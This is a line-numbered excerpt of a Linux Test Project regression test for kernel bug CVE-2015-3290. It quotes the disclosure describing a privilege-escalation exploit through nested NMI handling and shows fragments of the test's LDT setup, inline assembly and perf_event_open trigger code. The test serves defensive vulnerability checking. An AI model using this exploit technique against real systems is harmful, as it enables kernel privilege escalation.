1 // SPDX-License-Identifier: GPL-2.0-or-later
4 * Copyright (c) 2018-2022 Linux Test Project
12 http://www.openwall.com/lists/oss-security/2015/08/04/8
14 > +++++ CVE-2015-3290 +++++
19 > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c…
21 > The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
23 > You can mitigate CVE-2015-3290 by blocking modify_ldt or
24 > perf_event_open using seccomp. A fully-functional, portable, reliable
32 reliable privilege escalation on any Linux x86_64 system in which
36 Glossing over a lot of details, the basic structure of Linux' nested NMI
55 Alas, on x86_64, there is no reasonable way to block NMIs to run the
60 restore register state correctly [1] when returning to a 16-bit stack
62 espfix64 is invoked on return, a well-behaved IRET is emulated by a
68 observably non-atomic.
73 gets ignored. There is a two-instruction window in which the return
74 context ends up with user-controlled RIP and CS set to __KERNEL_CS.
78 during the two-instruction window. This exploit appears to work
79 reasonably quickly across a fairly wide range of Linux versions.
92 - This exploit's payload just prints the text "CPL0". The exploit
99 - If you are using a kernel older than v4.1, a 64-bit build of the
102 as a 32-bit binary or (so I'm told) as an x32 binary.
104 - This is the first exploit I've ever written that contains genuine
105 hexadecimal code. The more assembly-minded among you can have
114 --Andy
126 #include <asm/ldt.h>
133 #include <linux/perf_event.h>
138 /* Abstractions for some 32-bit vs 64-bit differences. */
151 struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS]; in ssptr()
152 return &sels->ss; in ssptr()
158 struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS]; in csptr()
159 return &sels->cs; in csptr()
170 return &ctx->uc_mcontext.gregs[REG_SS]; in ssptr()
176 return &ctx->uc_mcontext.gregs[REG_CS]; in csptr()
185 /* Boring 16-bit data segment. */ in set_ldt()
191 .contents = 0, /* Data, expand-up */ in set_ldt()
200 if (TST_RET == -EINVAL) { in set_ldt()
202 "modify_ldt: 16-bit data segments are probably disabled"); in set_ldt()
211 asm volatile ( in try_corrupt_stack()
256 asm volatile ( in try_corrupt_stack()
362 fd = perf_event_open(&pe, 0, -1, -1, 0); in child_thread()
363 if (fd == -1) { in child_thread()
367 "no hardware counters"); in child_thread()
378 asm volatile ("mov %%ss, %0" : "=rm" (orig_ss)); in child_thread()
385 * If we ended up with IF == 0, there's no easy way to fix in child_thread()
435 if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1) in setup()
471 {"linux-git", "9b6e6a8334d5"},
472 {"CVE", "2015-3290"},